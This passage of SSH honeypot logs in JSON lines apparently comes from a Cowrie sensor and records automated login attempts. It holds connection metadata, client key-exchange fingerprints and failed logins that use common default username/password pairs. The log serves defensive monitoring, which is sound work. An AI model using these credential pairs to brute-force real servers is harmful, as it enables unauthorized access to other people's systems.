-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:11:05.864690Z","src_ip":"196.251.86.249","session":"c8ba5da2adf4"}
{"eventid":"cowrie.login.failed","username":"git","password":"p@ssw0rd","message":"login attempt [git/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:07.821252Z","src_ip":"196.251.86.249","session":"c8ba5da2adf4"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:09.500163Z","src_ip":"196.251.86.249","session":"c8ba5da2adf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33192,"dst_ip":"1.2.3.4","dst_port":22,"session":"6167587f9e7d","protocol":"ssh","message":"New connection: 212.227.235.229:33192 (1.2.3.4:22) [session: 6167587f9e7d]","sensor":"my-vps","timestamp":"2025-08-26T12:11:13.239452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:13.534121Z","src_ip":"212.227.235.229","session":"6167587f9e7d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:11:13.535697Z","src_ip":"212.227.235.229","session":"6167587f9e7d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":46442,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc7b813a3121","protocol":"ssh","message":"New connection: 83.168.105.65:46442 (1.2.3.4:22) [session: fc7b813a3121]","sensor":"my-vps","timestamp":"2025-08-26T12:11:14.902072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:14.905474Z","src_ip":"83.168.105.65","session":"fc7b813a3121"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:11:14.939429Z","src_ip":"83.168.105.65","session":"fc7b813a3121"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:15.088402Z","src_ip":"83.168.105.65","session":"fc7b813a3121"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd","message":"login attempt [admin/passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:15.621306Z","src_ip":"212.227.235.229","session":"6167587f9e7d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:16.127903Z","src_ip":"83.168.105.65","session":"fc7b813a3121"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:17.123591Z","src_ip":"212.227.235.229","session":"6167587f9e7d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39048,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8000db0c42e","protocol":"ssh","message":"New connection: 83.168.105.65:39048 (1.2.3.4:22) [session: b8000db0c42e]","sensor":"my-vps","timestamp":"2025-08-26T12:11:30.478354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:30.479282Z","src_ip":"83.168.105.65","session":"b8000db0c42e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:11:30.516287Z","src_ip":"83.168.105.65","session":"b8000db0c42e"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:30.629056Z","src_ip":"83.168.105.65","session":"b8000db0c42e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:31.668157Z","src_ip":"83.168.105.65","session":"b8000db0c42e"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":58326,"dst_ip":"1.2.3.4","dst_port":22,"session":"1665e8514c09","protocol":"ssh","message":"New connection: 83.168.105.65:58326 (1.2.3.4:22) [session: 1665e8514c09]","sensor":"my-vps","timestamp":"2025-08-26T12:11:45.951385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:45.952158Z","src_ip":"83.168.105.65","session":"1665e8514c09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:11:45.988977Z","src_ip":"83.168.105.65","session":"1665e8514c09"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:46.101672Z","src_ip":"83.168.105.65","session":"1665e8514c09"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:47.140313Z","src_ip":"83.168.105.65","session":"1665e8514c09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50042,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8ae4dcb3643","protocol":"ssh","message":"New connection: 212.227.235.229:50042 (1.2.3.4:22) [session: a8ae4dcb3643]","sensor":"my-vps","timestamp":"2025-08-26T12:11:47.394739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:47.655554Z","src_ip":"212.227.235.229","session":"a8ae4dcb3643"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:11:47.658242Z","src_ip":"212.227.235.229","session":"a8ae4dcb3643"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T12:11:49.652160Z","src_ip":"212.227.235.229","session":"a8ae4dcb3643"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:50.952453Z","src_ip":"212.227.235.229","session":"a8ae4dcb3643"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43556,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f9302894e98","protocol":"ssh","message":"New connection: 83.168.105.65:43556 (1.2.3.4:22) [session: 4f9302894e98]","sensor":"my-vps","timestamp":"2025-08-26T12:12:01.422198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:01.423173Z","src_ip":"83.168.105.65","session":"4f9302894e98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:12:01.460363Z","src_ip":"83.168.105.65","session":"4f9302894e98"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:01.575098Z","src_ip":"83.168.105.65","session":"4f9302894e98"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:02.614783Z","src_ip":"83.168.105.65","session":"4f9302894e98"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38308,"dst_ip":"1.2.3.4","dst_port":22,"session":"eba76d244783","protocol":"ssh","message":"New connection: 196.251.86.249:38308 (1.2.3.4:22) [session: eba76d244783]","sensor":"my-vps","timestamp":"2025-08-26T12:12:05.376017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:05.963151Z","src_ip":"196.251.86.249","session":"eba76d244783"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:12:05.964174Z","src_ip":"196.251.86.249","session":"eba76d244783"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:08.015035Z","src_ip":"196.251.86.249","session":"eba76d244783"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:09.547099Z","src_ip":"196.251.86.249","session":"eba76d244783"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51462,"dst_ip":"1.2.3.4","dst_port":22,"session":"93bfb6d9e33c","protocol":"ssh","message":"New connection: 83.168.105.65:51462 (1.2.3.4:22) [session: 93bfb6d9e33c]","sensor":"my-vps","timestamp":"2025-08-26T12:12:16.919146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:16.919834Z","src_ip":"83.168.105.65","session":"93bfb6d9e33c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:12:16.959454Z","src_ip":"83.168.105.65","session":"93bfb6d9e33c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:17.079444Z","src_ip":"83.168.105.65","session":"93bfb6d9e33c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:18.120745Z","src_ip":"83.168.105.65","session":"93bfb6d9e33c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38234,"dst_ip":"1.2.3.4","dst_port":22,"session":"975fea3b2d68","protocol":"ssh","message":"New connection: 212.227.235.229:38234 (1.2.3.4:22) [session: 975fea3b2d68]","sensor":"my-vps","timestamp":"2025-08-26T12:12:21.130045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:21.475019Z","src_ip":"212.227.235.229","session":"975fea3b2d68"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:12:21.475827Z","src_ip":"212.227.235.229","session":"975fea3b2d68"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:12:23.429021Z","src_ip":"212.227.235.229","session":"975fea3b2d68"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:12:24.728989Z","src_ip":"212.227.235.229","session":"975fea3b2d68"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55488,"dst_ip":"1.2.3.4","dst_port":22,"session":"efe4d86a9a1f","protocol":"ssh","message":"New connection: 83.168.105.65:55488 (1.2.3.4:22) [session: efe4d86a9a1f]","sensor":"my-vps","timestamp":"2025-08-26T12:12:32.466017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:12:32.466886Z","src_ip":"83.168.105.65","session":"efe4d86a9a1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@o